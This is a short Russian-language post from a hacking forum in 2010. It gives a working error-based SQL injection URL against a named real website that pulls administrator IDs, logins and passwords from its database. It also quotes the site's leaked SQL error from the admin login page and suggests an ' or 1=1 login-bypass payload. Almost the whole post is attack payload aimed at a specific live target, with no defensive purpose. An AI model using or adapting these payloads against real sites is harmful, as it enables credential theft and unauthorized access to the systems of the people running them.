09.09.2010, 22:39
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами:
9000386
Репутация:
1148
|
|
1
Код:
http://www.xvideo.ru/catalog.php?group=7+/*!oR+1+gRoUp+bY+cOnCat%28%28SeLEcT+concat_ws%280x3a,id,password,login%29%20from%20a_admins%20limit%200,1%29,rAnD%280%29|0%29+hAvInG+miN%280%29%20*/
http://www.xvideo.ru/admin/login.php?action=send
там такое:
Сообщение от None
064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''asdasd'' and banned = 0' at line 1
select id, password from a_admins where login = 'asdasd'
' and banned = 0
если подмутить типо такого в логин, то должно пустить поидеи:
Сообщение от None
' or 1=1 limit 0,1[комент|продлить]
зы итак крутить через ошибку можно
|
|
|